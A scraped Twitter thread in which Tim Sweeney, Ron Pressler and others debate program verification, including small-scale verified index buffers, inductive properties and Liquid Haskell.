McAllester?'s Ontic (https://mitpress.mit.edu/books/ontic ) makes the leap in recognizing logic programming constructs for expressing the values inhabiting types. However, the elegance is easy to mistake with LISP macro hackery given the s-expression syntax. 0 replies 0 retweets 6 likes

Ron Pressler ‏ @pressron Apr 1 Replying to @TimSweeneyEpic?

In the early '00s it was proven that linguistic abstractions and various forms of decomposition cannot make verification easy (and BTW, in practice, the languages that have so far had the best success in terms of both formal and informal verification are synchronous languages) 1 reply 0 retweets 3 likes Tim Sweeney ‏ @TimSweeneyEpic? Apr 1

Yes, the general case of verification is theorem-proving. The ultimate language ultimately support that, but ought to also make it much easier than present to adopt small-scale verification easily. 1 reply 0 retweets 0 likes Tim Sweeney ‏ @TimSweeneyEpic? Apr 1

For example, today accessing vertices through an integer index buffer introduces a potential array-out-of-bounds at every step. If we could make those accesses into potential failures, the compiler could point that out for us. 1 reply 0 retweets 3 likes Tim Sweeney ‏ @TimSweeneyEpic? Apr 1

Then if we could express that index buffer as an array of natural numbers less than the number of vertices, then the compiler could recognize that and generate safe and faster code. This is the spirit of verification "in the small". 2 replies 0 retweets 3 likes Ron Pressler ‏ @pressron Apr 1

It's easy to characterize what you call "verification in the small" as properties that can be readily expressed as what's called inductive properties (also, compositional properties). It is also easy to show that most interesting program properties do not have this quality. 1 reply 0 retweets 4 likes Ron Pressler ‏ @pressron Apr 1

It's certainly likely that tooling that allows more inductive properties to be easily verified would help us write better programs, but it is unclear by how much. It is also likely that any (probably small) progress will be quickly dwarfed by growing requirements. 1 reply 0 retweets 1 like Ron Pressler ‏ @pressron Apr 1

(P.S. an inductive/compositional property is one that is preserved by any operation in the language, and equivalently, if A and B are any terms for which the property holds, then it also holds for A ; B, where ; is some composition) 1 reply 0 retweets 2 likes Profiles Georg ‏ @PLT_cheater Apr 1

Ron, what Tim is talking about is realized by eg Liquid Haskell, and the problem he'd solve with it is very practical and tangible. I would not say it's not a useful property. 1 reply 0 retweets 3 likes

New conversation Ron Pressler ‏ @pressron Apr 2

It's not that no easy property is useful, it's that most useful properties aren't easy. The easy properties can only take you so far, and while that may have some positive impact on correctness, it's not a drastic one. 0 replies 0 retweets 0 likes